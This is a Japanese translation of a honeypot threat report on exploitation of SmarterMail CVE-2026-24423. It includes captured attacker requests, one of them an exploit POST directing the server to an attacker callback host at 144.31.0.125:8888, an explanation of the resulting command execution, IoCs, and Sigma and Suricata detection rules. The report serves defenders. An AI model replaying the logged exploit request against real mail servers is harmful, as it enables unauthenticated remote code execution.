TL;DR
- CVE-2026-24423をターゲットに、ポート9998でSmarterMail Enterprise Build 8950をエミュレートするBeelzebubハニーポットをデプロイしました
- 3日間のウィンドウ内で、センサーはCVE悪用の完全なライフサイクルをキャプチャしました:バックグラウンドスキャン、ターゲット偵察、自動脆弱性検証、および武装化されたエクスプロイト配信
- 同一IP(
144.31.0.125)がNucleiベースの検証を実行してから、63分後に専用のPoC スクリプトで戻ってきて、実際のエクスプロイトを試行しました - 攻撃者は既知のAPIエンドポイント変異体(
/api/v1/settings/sysadmin/connect-to-hubと/api/v1/settings/system-admin/hub/connect)の両方を同時にプローブし、SmarterMailのバージョン固有のルーティング差異への認識を示しました - 武装化されたペイロードは
http://144.31.0.125:8888へのアウトバウンドコールバックを試行しました。これは実際のSmarterMailインスタンス上では、任意のコマンドを含む悪意のあるマウント構成をフェッチしたはずです
背景
CVE-2026-24423は、Build 9511より前のSmarterTools SmarterMailにおける認証なしのリモートコード実行脆弱性です。脆弱性のあるエンドポイント/api/v1/settings/sysadmin/connect-to-hubは認証を必要とせず、メールサーバーに攻撃者が管理する「ハブ」アドレスに接続するよう指示することができます。
SmarterMailインスタンスがこのリクエストを処理するとき、攻撃者が管理するhubAddressに接続し、CommandMountパラメータを含むJSON構成をダウンロードしてから、その値をシステムレベルのコマンド実行関数に直接渡します。Linuxでは、これは/bin/bash -cに該当します;Windowsではcmd.exe /cに該当します。結果はSmarterMailプロセスの権限での完全なRCEです。
この脆弱性は少なくとも4人の研究者(watchTowr社のSina KheirkhahとPiotr Bazydlo、CODE WHITE GmbH社のMarkus Wulftange、VulnCheck社のCale Black)によって独立して発見され、2026年1月15日のリリースでパッチされました。CISAは2026年2月6日にこれを既知の悪用脆弱性カタログに追加しました。2月中旬までに、大規模な悪用が十分に文書化されており、watchToarは約60個の一意の攻撃者IPから1,000以上の悪用試行を報告しました。
完全な根本原因分析と逆コンパイルコードウォークスルーについては、Cale BlackによるVulnCheckのレポートを参照してください。
受信側からこの悪用がどのように見えるかを確認したいと考えました。
ハニーポットの設定
Beelzebubインスタンスをポート9998(SmarterMailのデフォルトWebインターフェースポート)でリッスンするようにして、脆弱なSmarterMailデプロイメントをエミュレートしました。目標は、アウトバウンド接続をせずにインバウンドエクスプロイト試行をキャプチャすることでした。
設計決定:
| 決定 | 根拠 |
|---|---|
| ポート9998 | SmarterMailのデフォルトWeb UIポート。スキャナーが探すものと一致します。 |
レスポンスヘッダー:Server: Microsoft-IIS/10.0、X-Powered-By: ASP.NET |
SmarterMailはIIS/.NET上で実行されます。これらのヘッダーは基本的なフィンガープリンティングチェックを通過します。 |
X-SmarterMail-Version: 100.0.8950 |
Build 8950はパッチされたBuild 9511より下であり、バージョン認識ツールに脆弱性を示します。 |
/api/v1/licensing/aboutのバージョンエンドポイント |
攻撃者とスキャナーはこのエンドポイントをチェックして、悪用にコミットする前にビルド番号を確認します。実際のSmarterMailの出力をミミックしした完全なJSONオブジェクトを返します。 |
ConnectToHubエンドポイントは{"success": true}を返す |
POSTを受け入れて完全なペイロード(コールバックhubAddressを含む)をログしますが、アウトバウンド接続は行いません。攻撃者は「成功」レスポンスを見て、サーバーが処理中だと信じます。 |
/のHTMLログインページ |
スクリーンショットボット、クローラー、および手動オペレータは現実的なSmarterMailログインフォームを見ます。手動攻撃者のための滞留時間を増やします。 |
設定スニペット:
apiVersion: "v1"
protocol: "http"
address: ":9998"
description: "SmarterMail Enterprise Build 8950 (Vulnerable emulation)"
headers:
- "Server: Microsoft-IIS/10.0"
- "X-Powered-By: ASP.NET"
- "X-AspNet-Version: 4.0.30319"
commands:
- regex: "^/api/v1/settings/sysadmin/connect-to-hub.*$"
headers:
- "Content-Type: application/json; charset=utf-8"
- "X-SmarterMail-Version: 100.0.8950"
statusCode: 200
handler: |
{
"success": true,
"message": "Hub connection handshake initiated.",
"data": {
"status": "negotiating",
"transactionId": "550e8400-e29b-41d4-a716-446655440000"
}
}
- regex: "^/api/v1/licensing/about.*$"
headers:
- "Content-Type: application/json"
statusCode: 200
handler: |
{
"product": "SmarterMail Enterprise",
"version": "100.0.8950",
"buildDate": "2025-11-20T14:00:00Z",
"isLicensed": true,
"licenseType": "Enterprise"
}イベントのタイムライン
フェーズ1:バックグラウンド放射(2月8-10日)
デプロイメント後数時間以内に、ハニーポットはトラフィックを受け取り始めました。この初期アクティビティの大部分は、サービスをプローブする自動スキャナーとアセット検出プラットフォームで構成されていました。
| タイムスタンプ (UTC) | ソースIP | ユーザーエージェント | URI | メソッド |
|---|---|---|---|---|
| 2026-02-08 06:48:48 | 147.185.133.233 | Palo Alto Networks Cortex Xpanse | / |
GET |
| 2026-02-08 10:32:14 | 72.14.178.148 | Mozilla/5.0 zgrab/0.x |
/ |
GET |
| 2026-02-08 10:35:06 | 65.49.1.172 | Chrome/119.0 (Windows 10) | / |
GET |
| 2026-02-08 10:35:42 | 65.49.1.181 | Firefox/56.0 (Linux) | /favicon.ico |
GET |
| 2026-02-08 10:36:47 | 172.236.228.229 | Chrome/108.0 (macOS 13) | / |
GET |
| 2026-02-08 11:15:33 | 172.236.228.38 | Chrome/108.0 (macOS 13) | / |
GET |
| 2026-02-09 02:25:15 | 91.196.152.217 | Firefox/134.0 (Ubuntu Linux) | / |
GET |
| 2026-02-09 02:27:34 | 91.231.89.29 | Firefox/134.0 (Ubuntu Linux) | /favicon.ico |
GET |
| 2026-02-09 03:30:07 | 162.216.149.200 | Palo Alto Networks Cortex Xpanse | / |
GET |
| 2026-02-09 08:31:22 | 64.62.197.2 | Chrome/116.0 (Windows 10) | / |
GET |
| 2026-02-09 08:31:48 | 64.62.197.11 | Firefox/141.0 (macOS 10.15) | /favicon.ico |
GET |
| 2026-02-09 17:58:19 | 35.203.211.172 | Palo Alto Networks Cortex Xpanse | / |
GET |
観察:
- すべてのトラフィックは
/または/favicon.icoへのGETリクエストでした - SmarterMail固有のエンドポイントとの相互作用はなし
- 複数のPalo Alto Cortex Xpanseスキャン(自己確認するユーザーエージェント)
72.14.178.148からのzgrabスキャナー(一般的な調査/偵察ツール)- 隣接するサブネットからの複数のIP が数秒以内にヒット(
65.49.1.x、64.62.197.x)。これは調整されたスキャニングインフラストラクチャを示唆しています
フェーズ2:体系的な偵察(2月10日)
2月10日、単一のIPがバックグラウンドスキャンより構造化されたものを実行しました。154.197.56.163は標準的なWebアプリケーション検出エンドポイントの順序立った巡回を実行しました。
| タイムスタンプ (UTC) | URI | 目的 |
|---|---|---|
| 06:02:39 | / |
ランディングページ |
| 06:02:39 | /favicon.ico |
ファビコンチェック |
| 06:02:39 | /robots.txt |
クロール指令 |
| 06:02:40 | /.well-known/security.txt |
セキュリティ連絡先/情報開示情報 |
| 06:02:40 | /sitemap.xml |
サイト構造 |
| 06:02:40 | /llms.txt |
LLM関連コンテンツチェック |
注目すべき詳細: /llms.txtのリクエストは興味深いです。これは比較的新しい慣習(robots.txtに似た)で、大規模言語モデルのコンテンツポリシーを示すために使用されます。クロールパターンにおけるその存在は、新しいWeb標準に対応するためにアクティブに更新されているツール提供をほのめかしています。
/への初期リクエストはUser-Agentヘッダーなしで到着し、ユーザーエージェントChrome/86.0.4240.111が後続リクエストに適用されました。最初のリクエストはホストが確認されたら軽量なプローブです。完全なブラウザUAは後続リクエストに適用されます。
これのすべては2秒間のウィンドウ(06:02:39から06:02:40)内に発生しており、これが自動化されたことを確認しています。
フェーズ3:Nuclei検証(2月11日、06:55 UTC)
2月11日、ハニーポットはCVE固有の最初のトラフィックをログしました。2つのPOSTリクエストが同一のタイムスタンプで144.31.0.125から到着し、脆弱なエンドポイントの既知の変異体の両方をターゲットにしました。
リクエスト1:レガシーエンドポイント
{
"DateTime": "2026-02-11T06:55:01Z",
"SourceIp": "144.31.0.125",
"HTTPMethod": "POST",
"RequestURI": "/api/v1/settings/sysadmin/connect-to-hub",
"Body": "{\"hubAddress\":\"http://127.0.0.1:99999\",\"oneTimePassword\":\"nuclei-check\",\"nodeName\":\"nuclei\"}",
"UserAgent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
}リクエスト2:新しいエンドポイント変異体
{
"DateTime": "2026-02-11T06:55:01Z",
"SourceIp": "144.31.0.125",
"HTTPMethod": "POST",
"RequestURI": "/api/v1/settings/system-admin/hub/connect",
"Body": "{\"hubUrl\":\"http://127.0.0.1:99999\"}",
"UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Safari/537.36"
}分析:
nodeName: "nuclei"とoneTimePassword: "nuclei-check"はNucleiテンプレート使用の強い指標ですhubAddressは127.0.0.1:99999を指し、非ルーティング可能なアドレスです。これは検証チェックであり、悪用試行ではありません。オペレータはエンドポイントが存在し、JSON構造を受け入れることを確認しています。- 2つのリクエストは異なるUser-Agentストリングを使用していますが、同じ秒に到着します。これは単一のスキャニング実行です。
- 2番目のリクエストは
/api/v1/settings/system-admin/hub/connectをターゲットにしており、異なるJSON構造(hubUrlではなくhubAddress)を使用しています。これはSmarterMailの異なるバージョンのルーティングにマッピングされます。攻撃者のツール提供はバージョン認識です。
フェーズ4:武装化されたエクスプロイト配信(2月11日、07:58 UTC)
Nuclei検証の正確に63分後に、同じIPが戻ってきました。今回は、すべてが変わりました。
{
"DateTime": "2026-02-11T07:58:46Z",
"SourceIp": "144.31.0.125",
"HTTPMethod": "POST",
"RequestURI": "/api/v1/settings/sysadmin/connect-to-hub",
"Body": "{\"hubAddress\": \"http://144.31.0.125:8888\", \"oneTimePassword\": \"test\", \"nodeName\": \"poc-node\"}",
"UserAgent": "CVE-2026-24423-PoC"
}変更内容:
| フィールド | Nucleiプローブ (06:55) | 武装化された試行 (07:58) |
|---|---|---|
| ユーザーエージェント | 汎用Chrome UA | CVE-2026-24423-PoC |
| hubAddress | http://127.0.0.1:99999 (安全/ローカル) |
http://144.31.0.125:8888 (攻撃者管理のコールバック) |
| oneTimePassword | nuclei-check |
test |
| nodeName | nuclei |
poc-node |
ユーザーエージェントCVE-2026-24423-PoCは公開概念実証スクリプトの使用を示します。hubAddressは攻撃者自身のインフラストラクチャであるポート8888に指します。実際のSmarterMailインスタンスでは、サーバーは:
http://144.31.0.125:8888/web/api/node-management/setup-initial-connectionに接続するCommandMountフィールドを含むSystemMountオブジェクトを含むJSONレスポンスをダウンロードするCommandMount値を/bin/bash -c(Linux)またはcmd.exe /c(Windows)に渡す- 攻撃者が指定したコマンドを実行する
これはハニーポットなので、インバウンドペイロードをログして成功レスポンスを返しました。アウトバウンド接続は行われませんでした。
ペイロード分析
144.31.0.125からの2つのフェーズ間の重要な比較:
| 属性 | フェーズ3:検証 | フェーズ4:悪用 |
|---|---|---|
| 時刻 | 06:55:01 UTC | 07:58:46 UTC |
| デルタ | — | +63分 |
| ツール | Nucleiスキャナー | 公開PoC スクリプト |
| ユーザーエージェント | なりすまされたChrome | CVE-2026-24423-PoC |
| hubAddress | 127.0.0.1:99999 (localhost) |
144.31.0.125:8888 (コールバック) |
| 意図 | 「このエンドポイントは存在しますか?」 | 「RCEのためにこちらに接続する」 |
| ターゲットエンドポイント | 2(両方の変異体) | 1(レガシー変異体のみ) |
63分のギャップは意味があります。これは1つのパスでスキャンと悪用を行う単一の自動スクリプトではありません。ループ内に人間がいるか、または最低限、ステージングステップを持つパイプラインがあります:スキャン結果がトリアージされてから、別の悪用ツールが確認されたターゲットに向けられます。
武装化された試行が両方の変異体をチェックしたNucleiスキャンの間、レガシーエンドポイント(/api/v1/settings/sysadmin/connect-to-hub)のみをヒットしたという事実は、オペレータがスキャン結果を確認し、何が応答したかに基づいてターゲットにするエンドポイントを決定したことを示唆しています。
スキャニングエコシステム
ハニーポットを実行することの値の1つは、脆弱なサービスが引き付けるトラフィックの完全なスペクトルを見ることです。すべての接続が攻撃者ではありません。カテゴリーを理解することは、ディフェンダーが自分のログをトリアージするのに役立ちます。
3日間の観察ウィンドウ内で、トラフィックを4つのティアに分類しました:
| ティア | 説明 | ユニークIP | 動作 |
|---|---|---|---|
| 1. 攻撃サーフェス管理 | 自己確認する商用スキャナー(Palo Alto Cortex Xpanse) | 4 | /のGETのみ。クリアなUser-Agent識別。同じ範囲内の異なるIPからの定期的な再スキャン。 |
| 2. 研究スキャナー | zgrabおよびもしくは同様のツール |
1 | zgrab/0.xユーザーエージェント付きで/にGET。単一パス。 |
| 3. 一般的なクローラー | さまざまなブラウザUA、順序立つポート/サービス列挙 | ~10 | /、/favicon.icoにGET。隣接するIPからのいくつかの順序立つ。検出エンドポイントの1つの体系的なクロール。 |
| 4. CVEターゲット化 | Nuclei検証の後の悪用配信 | 1 | CVE固有のAPIエンドポイントへのPOST悪用ペイロード。 |
比率は概ね予想通りです:ノイズが多い、いくつかの研究者、そして特定の意図を持つ少数のオペレータ。ディフェンダーにとって重要なのは、ティア4だけがSmarterMail固有のエンドポイントに接触したということです。他はすべて汎用的なWeb探索でした。
危険指標 (IoCs)
ネットワーク指標
# CVE-2026-24423 エンドポイントをターゲットにしたIPアドレス
144.31.0.125
# コールバックアドレス(攻撃者管理)
http://144.31.0.125:8888
# ターゲットエンドポイント
/api/v1/settings/sysadmin/connect-to-hub
/api/v1/settings/system-admin/hub/connectリクエスト署名
# ユーザーエージェント文字列
CVE-2026-24423-PoC
# JSONボディパターン(POSTリクエスト)
"nodeName": "nuclei"
"nodeName": "poc-node"
"oneTimePassword": "nuclei-check"
"hubAddress": "http://144.31.0.125:8888"
"hubUrl": "http://127.0.0.1:99999"非悪意のあるスキャナー署名(ログトリアージ用)
# Palo Alto Cortex Xpanse(正当なASM)
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
# zgrab研究スキャナー
User-Agent: Mozilla/5.0 zgrab/0.x検出ルール
Sigmaルール
title: SmarterMail CVE-2026-24423 ConnectToHub悪用試行
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: CVE-2026-24423悪用に使用されるSmarterMail ConnectToHub APIエンドポイントへのPOSTリクエストを検出します
references:
- https://nvd.nist.gov/vuln/detail/CVE-2026-24423
- https://vulncheck.com/blog/smartermail-rce
logsource:
category: webserver
product: iis
detection:
selection_method:
cs-method: 'POST'
selection_uri:
cs-uri-stem|contains:
- '/api/v1/settings/sysadmin/connect-to-hub'
- '/api/v1/settings/system-admin/hub/connect'
condition: selection_method and selection_uri
falsepositives:
- 正当なSmarterMail Hub設定(非常にまれであり、既知の管理者IPからのみ)
level: critical
tags:
- attack.initial_access
- attack.t1190
- attack.execution
- attack.t1059
- cve.2026.24423Suricataルール
alert http any any -> $HOME_NET 9998 (msg:"CVE-2026-24423 SmarterMail ConnectToHub悪用試行";
flow:established,to_server;
http.method; content:"POST";
http.uri; content:"/connect-to-hub";
http.request_body; content:"hubAddress";
classtype:attempted-admin; sid:2026024423; rev:1;)
alert http any any -> $HOME_NET 9998 (msg:"CVE-2026-24423 SmarterMail Nuclei検証スキャン";
flow:established,to_server;
http.method; content:"POST";
http.uri; content:"/connect-to-hub";
http.request_body; content:"nuclei";
classtype:attempted-recon; sid:2026024424; rev:1;)クイックログチェック(IIS ログ)
SmarterMail IISログをすぐにチェックしたいディフェンダー向け:
# connect-to-hub エンドポイントへのPOSTをチェック
grep -i "connect-to-hub\|hub/connect" /path/to/iis/logs/u_ex*.log | grep "POST"
# 既知のPoC User-Agentをチェック
grep -i "CVE-2026-24423" /path/to/iis/logs/u_ex*.log主要な発見
1. 63分のパイプライン
Nuclei検証と武装化されたエクスプロイト配信の間のギャップは、同じソースIPから63分でした。これはスキャン結果が収集され、トリアージ(おそらく手動で)されて、別の悪用ツールに供給されるパイプラインを示唆しています。これは発火と忘却ではありません;ワークフローがあります。
2. バージョン認識ツール
Nucleiスキャンはレガシーエンドポイント(/api/v1/settings/sysadmin/connect-to-hub)と新しい変異体(/api/v1/settings/system-admin/hub/connect)の両方をバージョン適切なJSON構造でプローブしました。武装化されたフォローアップはレガシーエンドポイントのみをターゲットにしました。これは攻撃者(またはそれらのツール)がSmarterMailバージョン全体の差異を説明しているわけではないことを意味します。
3. ノイズは大きい
3日間にわたってログされたすべての接続のうち、CVE固有だったリクエストは3つ(単一のIP からのもの)です。他のすべてはバックグラウンドスキャンです。ディフェンダーが自分のログを確認するとき、既知のスキャナーUser-Agents(Cortex Xpanse、zgrab)をフィルタリングして、特定のAPIエンドポイントへのPOSTリクエストに焦点を合わせると、大幅に干し草の山を減らします。
4. PoCは公開され、使用中です
User-Agent:CVE-2026-24423-PoC文字列は、公開可能な悪用コードの使用を確認します。ツール提供を隠そうとする試みはありません。これはより広いパターンと一致しており、watchTowr は報告しました:オペレータは最小限のOPSECで商用悪用スクリプトをスケールで実行しています。
推奨事項
SmarterMailを実行する場合:
- 直ちにパッチを適用してください。 Build 9511以降に更新してください。パッチされたバージョンは
connect-to-hubエンドポイントで認証されていないリクエストに対してHTTP 400を返します。 - すぐにログをチェックしてください。 上記のgrepコマンドを使用してください。外部IPからの
connect-to-hubへのPOSTは疑わしいです。 /api/v1/licensing/aboutアクセスをチェックしてください。 攻撃者はこのエンドポイントをプローブしてビルドバージョンを確認してから悪用します。未知のIPからの高容量アクセスは攻撃前の指標です。- パッチされていない場合は侵害を想定してください。 CISAはこれを2月6日にKEVカタログに追加しました。インスタンスがインターネットに面していてその日付の後にパッチされていなかった場合、徹底的な調査を実施してください。
ディフェンダー(一般)の場合:
- このレポートからSigmaおよびSuricataルールをデプロイします検出パイプラインに。
- コールバックパターンを監視します。 悪用では被害者サーバーが攻撃者にアウトバウンドHTTP接続を行う必要があります。メールサーバーから未知のIPへのアウトバウンド接続が異常なポート(8888、8082など)上にあるのは強い信号です。
- 独自のハニーポットをデプロイすることを検討してください。 この設定を実行しているBeelzebubインスタンスは数分で設定でき、3日以内に実行可能なインテリジェンスをキャプチャしました。
参考資料
- VulnCheck Advisory: CVE-2026-24423 – SmarterMail ConnectToHub 認証なしRCE (Cale Black)
- CISA KEVカタログ CVE-2026-24423 エントリ
- watchTowr 悪用テレメトリ(Cyber Daily経由)
- SmarterMail Build 9511 リリースノート
- Beelzebub ハニーポット フレームワーク
翻訳元: https://beelzebub.ai/blog/watching-cve-2026-24423-hit-the-wire/